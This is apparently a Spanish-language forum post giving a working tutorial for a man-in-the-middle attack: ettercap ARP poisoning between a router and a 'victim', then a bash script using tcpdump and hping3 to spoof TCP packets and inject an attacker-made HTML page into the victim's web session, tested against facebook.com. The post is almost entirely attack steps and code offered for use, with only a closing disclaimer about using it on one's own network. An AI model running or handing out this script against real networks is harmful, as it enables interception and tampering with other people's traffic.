¡BUENAS A TODOOOOOS!!!
Al fin lo HE CONSEGUIDO. Ya tengo el script y me ha funcionado jeje pero tengo que optimizarlo porque hay veces que si funciona y otras que no.....la buena noticia es que se porque no funciona ha veces! jeje
Asi que aqui os voy a dejar un tutorial de como lo hago el MITM+Ip-Spoofing+Inyencion de fichero .html
1) Prerrequisitos:
SO: cualquier distribucion de linux (script en bash)
programas: ettercap, tcpdump, hping3, grep, cut (estos 2 ultimos vienen con linux)
2) abrimos un terminal y ponemos: $ettercap -G
con el ettercap en modo grafico pinchamos en: Sniff -> Unified sniffing y seleccionamos la interfaz que estemos usando (eth0 o wlan0...)
pinchamos en: Host -> scan for hosts
tras el escaneo pinchamos en: Host -> Host list
ahora veremos una lista de los host que hay dentro de nuestra LAN
pinchamos en la ip del router y pinchamos en Add to Target 1
pinchamos en la ip de la victima y pinchamos en Add to Target 2
pinchamos en: Start -> Start sniffing
pinchamos en: Mitm -> Arp poisoning
#Ya estamos haciendo un Man In The Middle
3) copiamos siguiente script:
tcpdump -A -i wlan0 -nvXSs 0 -c1 tcp | grep cksum | grep Flags | head -n 1 | cut -c5-130 > ficheroAux
ip1=$(cut -d' ' -f1 ficheroAux | cut -d. -f1-4)
port1=$(cut -d' ' -f1 ficheroAux| cut -d. -f5)
ip2=$(cut -d: -f1 ficheroAux | cut -d' ' -f2- |cut -d. -f1-4 | cut -c3-15)
port2=$(cut -d: -f1 ficheroAux | cut -d. -f9)
let seqnum=$(cut -dq -f2 ficheroAux | cut -c2-11 | cut -d, -f1)
let seqnumInc=$seqnum+1
hping3 -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567890 -L $seqnumInc -S -A -c 1
let seqnumInc2=$seqnumInc+1
hping3 -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567891 -L $seqnumInc2 -A -c 1
hping3 -a $ip2 $ip1 -s $port2 -p $port1 -M 1234567891 -L $seqnumInc2 -A -P -c 1 -d 500 -E miFichero.html
rm ficheroAux
En la ultima linea del hping3 cambiais miFichero.html por la ruta de un fichero vuestro en html con el siguiente formato:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 150
Date: Thu, 22 Mar 2012 02:02:42 GMT
Server: gws
<html>
Aqui podeis poner el texto que querais
</html>
4) ejecutais el script, y cuando la victima visite un web (ej.:
www.facebook.com)......... VOILA! se le habrio nuestro fichero html!!!
NOTA: El script es un poco lento...y si la victima hace la conexion muy rapida con el servidor web no funcionara....pero a mi con facebook.com me ha funcionado.
NOTA 2: Ahora estoy buscando una forma de optimizar el script para que sea mas rapido y funcione siempre. Ademas tengo la intencion de introducir la parte del ettercap dentro del script para que solo sea ejecutar y listo! jejeje
PD: NO ME HAGO RESPONSABLE DEL USO INDEBIDO DE ESTE TUTORIAL. SI ALGUIEN LO PONE EN PRACTICA QUE LO HAGA EN SU PROPIA RED Y CON SUS PROPIOS ORDENADORES!!!!
Un saludo a todos!!